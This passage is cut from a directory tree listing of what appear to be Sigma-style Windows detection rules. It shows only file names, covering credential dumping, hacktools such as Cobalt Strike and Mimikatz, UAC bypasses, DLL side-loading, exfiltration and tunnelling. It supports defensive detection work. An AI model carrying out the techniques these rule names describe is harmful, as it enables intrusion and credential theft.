file_event_win_office_macro_files_created.yml │ │ │ ├── file_event_win_office_macro_files_downloaded.yml │ │ │ ├── file_event_win_office_macro_files_from_susp_process.yml │ │ │ ├── file_event_win_office_onenote_files_in_susp_locations.yml │ │ │ ├── file_event_win_office_onenote_susp_dropped_files.yml │ │ │ ├── file_event_win_office_outlook_macro_creation.yml │ │ │ ├── file_event_win_office_outlook_newform.yml │ │ │ ├── file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml │ │ │ ├── file_event_win_office_outlook_susp_macro_creation.yml │ │ │ ├── file_event_win_office_publisher_files_in_susp_locations.yml │ │ │ ├── file_event_win_office_startup_persistence.yml │ │ │ ├── file_event_win_office_susp_file_extension.yml │ │ │ ├── file_event_win_office_uncommon_file_startup.yml │ │ │ ├── file_event_win_pcre_net_temp_file.yml │ │ │ ├── file_event_win_perflogs_susp_files.yml │ │ │ ├── file_event_win_powershell_drop_binary_or_script.yml │ │ │ ├── file_event_win_powershell_drop_powershell.yml │ │ │ ├── file_event_win_powershell_exploit_scripts.yml │ │ │ ├── file_event_win_powershell_module_creation.yml │ │ │ ├── file_event_win_powershell_module_susp_creation.yml │ │ │ ├── file_event_win_powershell_module_uncommon_creation.yml │ │ │ ├── file_event_win_powershell_startup_shortcuts.yml │ │ │ ├── file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml │ │ │ ├── file_event_win_rclone_config_files.yml │ │ │ ├── file_event_win_rdp_file_susp_creation.yml │ │ │ ├── file_event_win_redmimicry_winnti_filedrop.yml │ │ │ ├── file_event_win_regedit_print_as_pdf.yml │ │ │ ├── file_event_win_remcom_service.yml │ │ │ ├── file_event_win_remote_access_tools_screenconnect_artefact.yml │ │ │ ├── file_event_win_remote_access_tools_screenconnect_remote_file.yml │ │ │ ├── file_event_win_ripzip_attack.yml │ │ │ ├── file_event_win_sam_dump.yml │ │ │ ├── file_event_win_sed_file_creation.yml │ │ │ ├── file_event_win_shell_write_susp_directory.yml │ │ │ ├── 
file_event_win_shell_write_susp_files_extensions.yml │ │ │ ├── file_event_win_startup_folder_file_write.yml │ │ │ ├── file_event_win_susp_colorcpl.yml │ │ │ ├── file_event_win_susp_creation_by_mobsync.yml │ │ │ ├── file_event_win_susp_default_gpo_dir_write.yml │ │ │ ├── file_event_win_susp_desktop_txt.yml │ │ │ ├── file_event_win_susp_desktopimgdownldr_file.yml │ │ │ ├── file_event_win_susp_diagcab.yml │ │ │ ├── file_event_win_susp_double_extension.yml │ │ │ ├── file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml │ │ │ ├── file_event_win_susp_exchange_aspx_write.yml │ │ │ ├── file_event_win_susp_executable_creation.yml │ │ │ ├── file_event_win_susp_file_write_in_webapps_root.yml │ │ │ ├── file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml │ │ │ ├── file_event_win_susp_get_variable.yml │ │ │ ├── file_event_win_susp_hidden_dir_index_allocation.yml │ │ │ ├── file_event_win_susp_homoglyph_filename.yml │ │ │ ├── file_event_win_susp_legitimate_app_dropping_archive.yml │ │ │ ├── file_event_win_susp_legitimate_app_dropping_exe.yml │ │ │ ├── file_event_win_susp_legitimate_app_dropping_in_uncommon_location.yml │ │ │ ├── file_event_win_susp_legitimate_app_dropping_script.yml │ │ │ ├── file_event_win_susp_lnk_double_extension.yml │ │ │ ├── file_event_win_susp_powershell_profile.yml │ │ │ ├── file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml │ │ │ ├── file_event_win_susp_public_folder_extension.yml │ │ │ ├── file_event_win_susp_recycle_bin_fake_exec.yml │ │ │ ├── file_event_win_susp_right_to_left_override_extension_spoofing.yml │ │ │ ├── file_event_win_susp_spool_drivers_color_drop.yml │ │ │ ├── file_event_win_susp_startup_folder_persistence.yml │ │ │ ├── file_event_win_susp_system_interactive_powershell.yml │ │ │ ├── file_event_win_susp_task_write.yml │ │ │ ├── file_event_win_susp_teamviewer_remote_session.yml │ │ │ ├── file_event_win_susp_vscode_powershell_profile.yml │ │ │ ├── file_event_win_susp_wdac_policy_creation.yml │ │ │ ├── 
file_event_win_susp_windows_terminal_profile.yml │ │ │ ├── file_event_win_susp_winsxs_binary_creation.yml │ │ │ ├── file_event_win_sysinternals_adexplorer_dump_written.yml │ │ │ ├── file_event_win_sysinternals_livekd_default_dump_name.yml │ │ │ ├── file_event_win_sysinternals_livekd_driver.yml │ │ │ ├── file_event_win_sysinternals_livekd_driver_susp_creation.yml │ │ │ ├── file_event_win_sysinternals_procexp_driver_susp_creation.yml │ │ │ ├── file_event_win_sysinternals_procmon_driver_susp_creation.yml │ │ │ ├── file_event_win_sysinternals_psexec_service.yml │ │ │ ├── file_event_win_sysinternals_psexec_service_key.yml │ │ │ ├── file_event_win_system32_local_folder_privilege_escalation.yml │ │ │ ├── file_event_win_taskmgr_lsass_dump.yml │ │ │ ├── file_event_win_tsclient_filewrite_startup.yml │ │ │ ├── file_event_win_uac_bypass_consent_comctl32.yml │ │ │ ├── file_event_win_uac_bypass_dotnet_profiler.yml │ │ │ ├── file_event_win_uac_bypass_eventvwr.yml │ │ │ ├── file_event_win_uac_bypass_idiagnostic_profile.yml │ │ │ ├── file_event_win_uac_bypass_ieinstal.yml │ │ │ ├── file_event_win_uac_bypass_msconfig_gui.yml │ │ │ ├── file_event_win_uac_bypass_ntfs_reparse_point.yml │ │ │ ├── file_event_win_uac_bypass_winsat.yml │ │ │ ├── file_event_win_uac_bypass_wmp.yml │ │ │ ├── file_event_win_vhd_download_via_browsers.yml │ │ │ ├── file_event_win_vscode_tunnel_remote_creation_artefacts.yml │ │ │ ├── file_event_win_vscode_tunnel_renamed_execution.yml │ │ │ ├── file_event_win_webshell_creation_detect.yml │ │ │ ├── file_event_win_werfault_dll_hijacking.yml │ │ │ ├── file_event_win_winrar_file_creation_in_startup_folder.yml │ │ │ ├── file_event_win_winrm_awl_bypass.yml │ │ │ ├── file_event_win_wmi_persistence_script_event_consumer_write.yml │ │ │ ├── file_event_win_wmiexec_default_filename.yml │ │ │ ├── file_event_win_wmiprvse_wbemcomn_dll_hijack.yml │ │ │ ├── file_event_win_wpbbin_persistence.yml │ │ │ └── file_event_win_writing_local_admin_share.yml │ │ ├── 
file_executable_detected/ │ │ │ └── file_executable_detected_win_susp_embeded_sed_file.yml │ │ └── file_rename/ │ │ └── file_rename_win_ransomware.yml │ ├── image_load/ │ │ ├── image_load_clfs_load.yml │ │ ├── image_load_cmstp_load_dll_from_susp_location.yml │ │ ├── image_load_dll_amsi_suspicious_process.yml │ │ ├── image_load_dll_azure_microsoft_account_token_provider_dll_load.yml │ │ ├── image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml │ │ ├── image_load_dll_credui_uncommon_process_load.yml │ │ ├── image_load_dll_dbghelp_dbgcore_unsigned_load.yml │ │ ├── image_load_dll_pcre_dotnet_dll_load.yml │ │ ├── image_load_dll_rstrtmgr_suspicious_load.yml │ │ ├── image_load_dll_rstrtmgr_uncommon_load.yml │ │ ├── image_load_dll_sdiageng_load_by_msdt.yml │ │ ├── image_load_dll_system_management_automation_susp_load.yml │ │ ├── image_load_dll_tttracer_module_load.yml │ │ ├── image_load_dll_unsigned_node_load.yml │ │ ├── image_load_dll_vss_ps_susp_load.yml │ │ ├── image_load_dll_vssapi_susp_load.yml │ │ ├── image_load_dll_vsstrace_susp_load.yml │ │ ├── image_load_hktl_sharpevtmute.yml │ │ ├── image_load_hktl_silenttrinity_stager.yml │ │ ├── image_load_iexplore_dcom_iertutil_dll_hijack.yml │ │ ├── image_load_lsass_unsigned_image_load.yml │ │ ├── image_load_office_dotnet_assembly_dll_load.yml │ │ ├── image_load_office_dotnet_clr_dll_load.yml │ │ ├── image_load_office_dotnet_gac_dll_load.yml │ │ ├── image_load_office_excel_xll_susp_load.yml │ │ ├── image_load_office_outlook_outlvba_load.yml │ │ ├── image_load_office_powershell_dll_load.yml │ │ ├── image_load_office_vbadll_load.yml │ │ ├── image_load_rundll32_remote_share_load.yml │ │ ├── image_load_scrcons_wmi_scripteventconsumer.yml │ │ ├── image_load_side_load_7za.yml │ │ ├── image_load_side_load_abused_dlls_susp_paths.yml │ │ ├── image_load_side_load_antivirus.yml │ │ ├── image_load_side_load_appverifui.yml │ │ ├── image_load_side_load_aruba_networks_virtual_intranet_access.yml │ │ ├── image_load_side_load_avkkid.yml 
│ │ ├── image_load_side_load_ccleaner_du.yml │ │ ├── image_load_side_load_ccleaner_reactivator.yml │ │ ├── image_load_side_load_chrome_frame_helper.yml │ │ ├── image_load_side_load_classicexplorer32.yml │ │ ├── image_load_side_load_comctl32.yml │ │ ├── image_load_side_load_coregen.yml │ │ ├── image_load_side_load_cpl_from_non_system_location.yml │ │ ├── image_load_side_load_dbgcore.yml │ │ ├── image_load_side_load_dbghelp.yml │ │ ├── image_load_side_load_dbgmodel.yml │ │ ├── image_load_side_load_eacore.yml │ │ ├── image_load_side_load_edputil.yml │ │ ├── image_load_side_load_from_non_system_location.yml │ │ ├── image_load_side_load_goopdate.yml │ │ ├── image_load_side_load_gup_libcurl.yml │ │ ├── image_load_side_load_iviewers.yml │ │ ├── image_load_side_load_jli.yml │ │ ├── image_load_side_load_jsschhlp.yml │ │ ├── image_load_side_load_keyscrambler.yml │ │ ├── image_load_side_load_libvlc.yml │ │ ├── image_load_side_load_mfdetours.yml │ │ ├── image_load_side_load_mfdetours_unsigned.yml │ │ ├── image_load_side_load_mpsvc.yml │ │ ├── image_load_side_load_mscorsvc.yml │ │ ├── image_load_side_load_non_existent_dlls.yml │ │ ├── image_load_side_load_office_dlls.yml │ │ ├── image_load_side_load_python.yml │ │ ├── image_load_side_load_rcdll.yml │ │ ├── image_load_side_load_rjvplatform_default_location.yml │ │ ├── image_load_side_load_rjvplatform_non_default_location.yml │ │ ├── image_load_side_load_robform.yml │ │ ├── image_load_side_load_shell_chrome_api.yml │ │ ├── image_load_side_load_shelldispatch.yml │ │ ├── image_load_side_load_smadhook.yml │ │ ├── image_load_side_load_solidpdfcreator.yml │ │ ├── image_load_side_load_third_party.yml │ │ ├── image_load_side_load_ualapi.yml │ │ ├── image_load_side_load_vivaldi_elf.yml │ │ ├── image_load_side_load_vmguestlib.yml │ │ ├── image_load_side_load_vmmap_dbghelp_signed.yml │ │ ├── image_load_side_load_vmmap_dbghelp_unsigned.yml │ │ ├── image_load_side_load_vmware_xfer.yml │ │ ├── image_load_side_load_waveedit.yml │ │ ├── 
image_load_side_load_wazuh.yml │ │ ├── image_load_side_load_windows_defender.yml │ │ ├── image_load_side_load_wwlib.yml │ │ ├── image_load_susp_baaupdate_dll_load.yml │ │ ├── image_load_susp_clickonce_unsigned_module_loaded.yml │ │ ├── image_load_susp_dll_load_system_process.yml │ │ ├── image_load_susp_python_image_load.yml │ │ ├── image_load_susp_script_dotnet_clr_dll_load.yml │ │ ├── image_load_susp_unsigned_dll.yml │ │ ├── image_load_thor_unsigned_execution.yml │ │ ├── image_load_uac_bypass_iscsicpl.yml │ │ ├── image_load_uac_bypass_via_dism.yml │ │ ├── image_load_win_mmc_loads_script_engine_dll.yml │ │ ├── image_load_win_susp_dbgcore_dbghelp_load.yml │ │ ├── image_load_win_trusted_path_bypass.yml │ │ ├── image_load_wmi_persistence_commandline_event_consumer.yml │ │ ├── image_load_wmic_remote_xsl_scripting_dlls.yml │ │ ├── image_load_wmiprvse_wbemcomn_dll_hijack.yml │ │ └── image_load_wsman_provider_image_load.yml │ ├── network_connection/ │ │ ├── net_connection_win_addinutil_initiated.yml │ │ ├── net_connection_win_adws_unusual_connection.yml │ │ ├── net_connection_win_certutil_initiated_connection.yml │ │ ├── net_connection_win_cmstp_initiated_connection.yml │ │ ├── net_connection_win_dialer_initiated_connection.yml │ │ ├── net_connection_win_domain_azurewebsites.yml │ │ ├── net_connection_win_domain_btunnels.yml │ │ ├── net_connection_win_domain_cloudflared_communication.yml │ │ ├── net_connection_win_domain_crypto_mining_pools.yml │ │ ├── net_connection_win_domain_dead_drop_resolvers.yml │ │ ├── net_connection_win_domain_devtunnels.yml │ │ ├── net_connection_win_domain_dropbox_api.yml │ │ ├── net_connection_win_domain_external_ip_lookup.yml │ │ ├── net_connection_win_domain_google_api_non_browser_access.yml │ │ ├── net_connection_win_domain_localtonet_tunnel.yml │ │ ├── net_connection_win_domain_mega_nz.yml │ │ ├── net_connection_win_domain_ngrok.yml │ │ ├── net_connection_win_domain_ngrok_tunnel.yml │ │ ├── 
net_connection_win_domain_notion_api_susp_communication.yml │ │ ├── net_connection_win_domain_portmap.yml │ │ ├── net_connection_win_domain_telegram_api_non_browser_access.yml │ │ ├── net_connection_win_domain_vscode_tunnel_connection.yml │ │ ├── net_connection_win_eqnedt.yml │ │ ├── net_connection_win_finger.yml │ │ ├── net_connection_win_imewdbld.yml │ │ ├── net_connection_win_notepad.yml │ │ ├── net_connection_win_office_outbound_non_local_ip.yml │ │ ├── net_connection_win_office_uncommon_ports.yml │ │ ├── net_connection_win_python.yml │ │ ├── net_connection_win_rdp_outbound_over_non_standard_tools.yml │ │ ├── net_connection_win_rdp_reverse_tunnel.yml │ │ ├── net_connection_win_rdp_to_http.yml │ │ ├── net_connection_win_regasm_network_activity.yml │ │ ├── net_connection_win_regsvr32_network_activity.yml │ │ ├── net_connection_win_remote_access_tools_anydesk_incoming_connection.yml │ │ ├── net_connection_win_rundll32_net_connections.yml │ │ ├── net_connection_win_silenttrinity_stager_msbuild_activity.yml │ │ ├── net_connection_win_susp_binary_no_cmdline.yml │ │ ├── net_connection_win_susp_file_sharing_domains_susp_folders.yml │ │ ├── net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml │ │ ├── net_connection_win_susp_malware_callback_port.yml │ │ ├── net_connection_win_susp_malware_callback_ports_uncommon.yml │ │ ├── net_connection_win_susp_outbound_kerberos_connection.yml │ │ ├── net_connection_win_susp_outbound_mobsync_connection.yml │ │ ├── net_connection_win_susp_outbound_smtp_connections.yml │ │ ├── net_connection_win_susp_remote_powershell_session.yml │ │ ├── net_connection_win_winlogon_net_connections.yml │ │ ├── net_connection_win_wordpad_uncommon_ports.yml │ │ ├── net_connection_win_wscript_cscript_local_connection.yml │ │ ├── net_connection_win_wscript_cscript_outbound_connection.yml │ │ └── net_connection_win_wuauclt_network_connection.yml │ ├── pipe_created/ │ │ ├── pipe_created_adfs_namedpipe_connection_uncommon_tool.yml │ │ ├── 
pipe_created_hktl_cobaltstrike.yml │ │ ├── pipe_created_hktl_cobaltstrike_re.yml │ │ ├── pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml │ │ ├── pipe_created_hktl_coercedpotato.yml │ │ ├── pipe_created_hktl_diagtrack_eop.yml │ │ ├── pipe_created_hktl_efspotato.yml │ │ ├── pipe_created_hktl_generic_cred_dump_tools_pipes.yml │ │ ├── pipe_created_hktl_koh_default_pipe.yml │ │ ├── pipe_created_powershell_alternate_host_pipe.yml │ │ ├── pipe_created_powershell_execution_pipe.yml │ │ ├── pipe_created_pua_csexec_default_pipe.yml │ │ ├── pipe_created_pua_paexec_default_pipe.yml │ │ ├── pipe_created_pua_remcom_default_pipe.yml │ │ ├── pipe_created_scrcons_wmi_consumer_namedpipe.yml │ │ ├── pipe_created_susp_malicious_namedpipes.yml │ │ └── pipe_created_sysinternals_psexec_default_pipe_susp_location.yml │ ├── powershell/ │ │ ├── powershell_classic/ │ │ │ ├── posh_pc_abuse_nslookup_with_dns_records.yml │ │ │ ├── posh_pc_delete_volume_shadow_copies.yml │ │ │ ├── posh_pc_downgrade_attack.yml │ │ │ ├── posh_pc_exe_calling_ps.yml │ │ │ ├── posh_pc_powercat.yml │ │ │ ├── posh_pc_remote_powershell_session.yml │ │ │ ├── posh_pc_remotefxvgpudisablement_abuse.yml │ │ │ ├── posh_pc_renamed_powershell.yml │ │ │ ├── posh_pc_susp_download.yml │ │ │ ├── posh_pc_susp_get_nettcpconnection.yml │ │ │ ├── posh_pc_susp_zip_compress.yml │ │ │ ├── posh_pc_tamper_windows_defender_set_mp.yml │ │ │ └── posh_pc_wsman_com_provider_no_powershell.yml │ │ ├── powershell_module/ │ │ │ ├── posh_pm_active_directory_module_dll_import.yml │ │ │ ├── posh_pm_alternate_powershell_hosts.yml │ │ │ ├── posh_pm_bad_opsec_artifacts.yml │ │ │ ├── posh_pm_clear_powershell_history.yml │ │ │ ├── posh_pm_decompress_commands.yml │ │ │ ├── posh_pm_exploit_scripts.yml │ │ │ ├── posh_pm_get_addbaccount.yml │ │ │ ├── posh_pm_get_clipboard.yml │ │ │ ├── posh_pm_hktl_evil_winrm_execution.yml │ │ │ ├── posh_pm_invoke_obfuscation_clip.yml │ │ │ ├── posh_pm_invoke_obfuscation_obfuscated_iex.yml │ │ │ ├── 
posh_pm_invoke_obfuscation_stdin.yml │ │ │ ├── posh_pm_invoke_obfuscation_var.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_compress.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_rundll.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_stdin.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_use_clip.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_use_mhsta.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_use_rundll32.yml │ │ │ ├── posh_pm_invoke_obfuscation_via_var.yml │ │ │ ├── posh_pm_malicious_commandlets.yml │ │ │ ├── posh_pm_remote_powershell_session.yml │ │ │ ├── posh_pm_remotefxvgpudisablement_abuse.yml │ │ │ ├── posh_pm_susp_ad_group_reco.yml │ │ │ ├── posh_pm_susp_download.yml │ │ │ ├── posh_pm_susp_get_nettcpconnection.yml │ │ │ ├── posh_pm_susp_invocation_generic.yml │ │ │ ├── posh_pm_susp_invocation_specific.yml │ │ │ ├── posh_pm_susp_local_group_reco.yml │ │ │ ├── posh_pm_susp_reset_computermachinepassword.yml │ │ │ ├── posh_pm_susp_smb_share_reco.yml │ │ │ ├── posh_pm_susp_zip_compress.yml │ │ │ └── posh_pm_syncappvpublishingserver_exe.yml │ │ └── powershell_script/ │ │ ├── posh_ps_aadinternals_cmdlets_execution.yml │ │ ├── posh_ps_access_to_browser_login_data.yml │ │ ├── posh_ps_active_directory_module_dll_import.yml │ │ ├── posh_ps_add_dnsclient_rule.yml │ │ ├── posh_ps_add_windows_capability.yml │ │ ├── posh_ps_adrecon_execution.yml │ │ ├── posh_ps_amsi_bypass_pattern_nov22.yml │ │ ├── posh_ps_amsi_null_bits_bypass.yml │ │ ├── posh_ps_apt_silence_eda.yml │ │ ├── posh_ps_as_rep_roasting.yml │ │ ├── posh_ps_audio_exfiltration.yml │ │ ├── posh_ps_automated_collection.yml │ │ ├── posh_ps_capture_screenshots.yml │ │ ├── posh_ps_clear_powershell_history.yml │ │ ├── posh_ps_clearing_windows_console_history.yml │ │ ├── posh_ps_cmdlet_scheduled_task.yml │ │ ├── posh_ps_computer_discovery_get_adcomputer.yml │ │ ├── posh_ps_copy_item_system_directory.yml │ │ ├── posh_ps_cor_profiler.yml │ │ ├── posh_ps_create_local_user.yml │ │ ├── posh_ps_create_volume_shadow_copy.yml │ │ ├── 
posh_ps_detect_vm_env.yml │ │ ├── posh_ps_directorysearcher.yml │ │ ├── posh_ps_directoryservices_accountmanagement.yml │ │ ├── posh_ps_disable_psreadline_command_history.yml │ │ ├── posh_ps_disable_windows_optional_feature.yml │ │ ├── posh_ps_dotnet_assembly_from_file.yml │ │ ├── posh_ps_download_com_cradles.yml │ │ ├── posh_ps_dsinternals_cmdlets.yml │ │ ├── posh_ps_dump_password_windows_credential_manager.yml │ │ ├── posh_ps_enable_psremoting.yml │ │ ├── posh_ps_enable_susp_windows_optional_feature.yml │ │ ├── posh_ps_enumerate_password_windows_credential_manager.yml │ │ ├── posh_ps_etw_trace_evasion.yml │ │ ├── posh_ps_export_certificate.yml │ │ ├── posh_ps_frombase64string_archive.yml │ │ ├── posh_ps_get_acl_service.yml │ │ ├── posh_ps_get_adcomputer.yml │ │ ├── posh_ps_get_adgroup.yml │ │ ├── posh_ps_get_adreplaccount.yml │ │ ├── posh_ps_get_childitem_bookmarks.yml │ │ ├── posh_ps_get_process_security_software_discovery.yml │ │ ├── posh_ps_hktl_rubeus.yml │ │ ├── posh_ps_hktl_winpwn.yml │ │ ├── posh_ps_hotfix_enum.yml │ │ ├── posh_ps_icmp_exfiltration.yml │ │ ├── posh_ps_import_module_susp_dirs.yml │ │ ├── posh_ps_install_unsigned_appx_packages.yml │ │ ├── posh_ps_invoke_command_remote.yml │ │ ├── posh_ps_invoke_dnsexfiltration.yml │ │ ├── posh_ps_invoke_obfuscation_clip.yml │ │ ├── posh_ps_invoke_obfuscation_obfuscated_iex.yml │ │ ├── posh_ps_invoke_obfuscation_stdin.yml │ │ ├── posh_ps_invoke_obfuscation_var.yml │ │ ├── posh_ps_invoke_obfuscation_via_compress.yml │ │ ├── posh_ps_invoke_obfuscation_via_rundll.yml │ │ ├── posh_ps_invoke_obfuscation_via_stdin.yml │ │ ├── posh_ps_invoke_obfuscation_via_use_clip.yml │ │ ├── posh_ps_invoke_obfuscation_via_use_mhsta.yml │ │ ├── posh_ps_invoke_obfuscation_via_use_rundll32.yml │ │ ├── posh_ps_invoke_obfuscation_via_var.yml │ │ ├── posh_ps_keylogging.yml │ │ ├── posh_ps_localuser.yml │ │ ├── posh_ps_mailboxexport_share.yml │ │ ├── posh_ps_malicious_commandlets.yml │ │ ├── posh_ps_malicious_keywords.yml │ │ ├── 
posh_ps_memorydump_getstoragediagnosticinfo.yml │ │ ├── posh_ps_modify_group_policy_settings.yml │ │ ├── posh_ps_msxml_com.yml │ │ ├── posh_ps_nishang_malicious_commandlets.yml │ │ ├── posh_ps_ntfs_ads_access.yml │ │ ├── posh_ps_office_comobject_registerxll.yml │ │ ├── posh_ps_packet_capture.yml │ │ ├── posh_ps_potential_invoke_mimikatz.yml │ │ ├── posh_ps_potential_unconstrained_delegation_discovery.yml │ │ ├── posh_ps_powershell_web_access_installation.yml │ │ ├── posh_ps_powerview_malicious_commandlets.yml │ │ ├── posh_ps_prompt_credentials.yml │ │ ├── posh_ps_psasyncshell.yml │ │ ├── posh_ps_psattack.yml │ │ ├── posh_ps_remote_session_creation.yml │ │ ├── posh_ps_remotefxvgpudisablement_abuse.yml │ │ ├── posh_ps_request_kerberos_ticket.yml │ │ ├── posh_ps_resolve_list_of_ip_from_file.yml │ │ ├── posh_ps_root_certificate_installed.yml │ │ ├── posh_ps_run_from_mount_diskimage.yml │ │ ├── posh_ps_script_with_upload_capabilities.yml │ │ ├── posh_ps_sensitive_file_discovery.yml │ │ ├── posh_ps_set_acl.yml │ │ ├── posh_ps_set_acl_susp_location.yml │ │ ├── posh_ps_set_policies_to_unsecure_level.yml │ │ ├── posh_ps_shellcode_b64.yml │ │ ├── posh_ps_shellintel_malicious_commandlets.yml │ │ ├── posh_ps_software_discovery.yml │ │ ├── posh_ps_store_file_in_alternate_data_stream.yml │ │ ├── posh_ps_susp_ace_tampering.yml │ │ ├── posh_ps_susp_ad_group_reco.yml │ │ ├── posh_ps_susp_alias_obfscuation.yml │ │ ├── posh_ps_susp_clear_eventlog.yml │ │ ├── posh_ps_susp_directory_enum.yml │ │ ├── posh_ps_susp_download.yml │ │ ├── posh_ps_susp_execute_batch_script.yml │ │ ├── posh_ps_susp_extracting.yml │ │ ├── posh_ps_susp_follina_execution.yml │ │ ├── posh_ps_susp_get_addefaultdomainpasswordpolicy.yml │ │ ├── posh_ps_susp_get_current_user.yml │ │ ├── posh_ps_susp_get_gpo.yml │ │ ├── posh_ps_susp_get_process.yml │ │ ├── posh_ps_susp_getprocess_lsass.yml │ │ ├── posh_ps_susp_gettypefromclsid.yml │ │ ├── posh_ps_susp_hyper_v_condlet.yml │ │ ├── posh_ps_susp_invocation_generic.yml │ │ 
├── posh_ps_susp_invocation_specific.yml │ │ ├── posh_ps_susp_invoke_webrequest_useragent.yml │ │ ├── posh_ps_susp_iofilestream.yml │ │ ├── posh_ps_susp_keylogger_activity.yml │ │ ├── posh_ps_susp_keywords.yml │ │ ├── posh_ps_susp_local_group_reco.yml │ │ ├── posh_ps_susp_mail_acces.yml │ │ ├── posh_ps_susp_mount_diskimage.yml │ │ ├── posh_ps_susp_mounted_share_deletion.yml │ │ ├── posh_ps_susp_networkcredential.yml │ │ ├── posh_ps_susp_new_psdrive.yml │ │ ├── posh_ps_susp_proxy_scripts.yml │ │ ├── posh_ps_susp_recon_export.yml │ │ ├── posh_ps_susp_remove_adgroupmember.yml │ │ ├── posh_ps_susp_service_dacl_modification_set_service.yml │ │ ├── posh_ps_susp_set_alias.yml │ │ ├── posh_ps_susp_smb_share_reco.yml │ │ ├── posh_ps_susp_ssl_keyword.yml │ │ ├── posh_ps_susp_start_process.yml │ │ ├── posh_ps_susp_unblock_file.yml │ │ ├── posh_ps_susp_wallpaper.yml │ │ ├── posh_ps_susp_win32_pnpentity.yml │ │ ├── posh_ps_susp_win32_shadowcopy_deletion.yml │ │ ├── posh_ps_susp_windowstyle.yml │ │ ├── posh_ps_susp_write_eventlog.yml │ │ ├── posh_ps_susp_zip_compress.yml │ │ ├── posh_ps_syncappvpublishingserver_exe.yml │ │ ├── posh_ps_tamper_windows_defender_rem_mp.yml │ │ ├── posh_ps_tamper_windows_defender_set_mp.yml │ │ ├── posh_ps_test_netconnection.yml │ │ ├── posh_ps_timestomp.yml │ │ ├── posh_ps_user_discovery_get_aduser.yml │ │ ├── posh_ps_user_profile_tampering.yml │ │ ├── posh_ps_using_set_service_to_hide_services.yml │ │ ├── posh_ps_vbscript_registry_modification.yml │ │ ├── posh_ps_veeam_credential_dumping_script.yml │ │ ├── posh_ps_web_request_cmd_and_cmdlets.yml │ │ ├── posh_ps_win32_nteventlogfile_usage.yml │ │ ├── posh_ps_win32_product_install_msi.yml │ │ ├── posh_ps_win_api_susp_access.yml │ │ ├── posh_ps_win_defender_exclusions_added.yml │ │ ├── posh_ps_windows_firewall_profile_disabled.yml │ │ ├── posh_ps_winlogon_helper_dll.yml │ │ ├── posh_ps_wmi_persistence.yml │ │ ├── posh_ps_wmi_unquoted_service_search.yml │ │ ├── posh_ps_wmimplant.yml │ │ ├── 
posh_ps_x509enrollment.yml │ │ └── posh_ps_xml_iex.yml │ ├── process_access/ │ │ ├── proc_access_win_cmstp_execution_by_access.yml │ │ ├── proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml │ │ ├── proc_access_win_hktl_generic_access.yml │ │ ├── proc_access_win_hktl_handlekatz_lsass_access.yml │ │ ├── proc_access_win_hktl_littlecorporal_generated_maldoc.yml │ │ ├── proc_access_win_hktl_sysmonente.yml │ │ ├── proc_access_win_lsass_dump_comsvcs_dll.yml │ │ ├── proc_access_win_lsass_dump_keyword_image.yml │ │ ├── proc_access_win_lsass_memdump.yml │ │ ├── proc_access_win_lsass_python_based_tool.yml │ │ ├── proc_access_win_lsass_remote_access_trough_winrm.yml │ │ ├── proc_access_win_lsass_seclogon_access.yml │ │ ├── proc_access_win_lsass_susp_access_flag.yml │ │ ├── proc_access_win_lsass_werfault.yml │ │ ├── proc_access_win_lsass_whitelisted_process_names.yml │ │ ├── proc_access_win_susp_all_access_uncommon_target.yml │ │ ├── proc_access_win_susp_dbgcore_dbghelp_load.yml │ │ ├── proc_access_win_susp_direct_ntopenprocess_call.yml │ │ ├── proc_access_win_svchost_credential_dumping.yml │ │ ├── proc_access_win_svchost_susp_access_request.yml │ │ ├── proc_access_win_uac_bypass_editionupgrademanagerobj.yml │ │ ├── proc_access_win_uac_bypass_wow64_logger.yml │ │ └── proc_access_win_werfaultsecure_msmpeng_access.yml │ ├── process_creation/ │ │ ├── proc_creation_win_7zip_exfil_dmp_files.yml │ │ ├── proc_creation_win_7zip_password_compression.yml │ │ ├── proc_creation_win_acccheckconsole_execution.yml │ │ ├── proc_creation_win_addinutil_suspicious_cmdline.yml │ │ ├── proc_creation_win_addinutil_uncommon_child_process.yml │ │ ├── proc_creation_win_addinutil_uncommon_cmdline.yml │ │ ├── proc_creation_win_addinutil_uncommon_dir_exec.yml │ │ ├── proc_creation_win_adplus_memory_dump.yml │ │ ├── proc_creation_win_agentexecutor_potential_abuse.yml │ │ ├── proc_creation_win_agentexecutor_susp_usage.yml │ │ ├── proc_creation_win_amsi_registry_tampering.yml │ │ ├── 
proc_creation_win_appvlp_uncommon_child_process.yml │ │ ├── proc_creation_win_arcsoc_susp_child_process.yml │ │ ├── proc_creation_win_aspnet_compiler_exectuion.yml │ │ ├── proc_creation_win_aspnet_compiler_susp_child_process.yml │ │ ├── proc_creation_win_aspnet_compiler_susp_paths.yml │ │ ├── proc_creation_win_at_interactive_execution.yml │ │ ├── proc_creation_win_atbroker_uncommon_ats_execution.yml │ │ ├── proc_creation_win_attrib_hiding_files.yml │ │ ├── proc_creation_win_attrib_system_susp_paths.yml │ │ ├── proc_creation_win_auditpol_nt_resource_kit_usage.yml │ │ ├── proc_creation_win_auditpol_susp_execution.yml │ │ ├── proc_creation_win_autorun_registry_modified_via_wmic.yml │ │ ├── proc_creation_win_baaupdate_susp_child_process.yml │ │ ├── proc_creation_win_bash_command_execution.yml │ │ ├── proc_creation_win_bash_file_execution.yml │ │ ├── proc_creation_win_bcdedit_boot_conf_tamper.yml │ │ ├── proc_creation_win_bcdedit_susp_execution.yml │ │ ├── proc_creation_win_bcp_export_data.yml │ │ ├── proc_creation_win_bginfo_suspicious_child_process.yml │ │ ├── proc_creation_win_bginfo_uncommon_child_process.yml │ │ ├── proc_creation_win_bitlockertogo_execution.yml │ │ ├── proc_creation_win_bitsadmin_download.yml │ │ ├── proc_creation_win_bitsadmin_download_direct_ip.yml │ │ ├── proc_creation_win_bitsadmin_download_file_sharing_domains.yml │ │ ├── 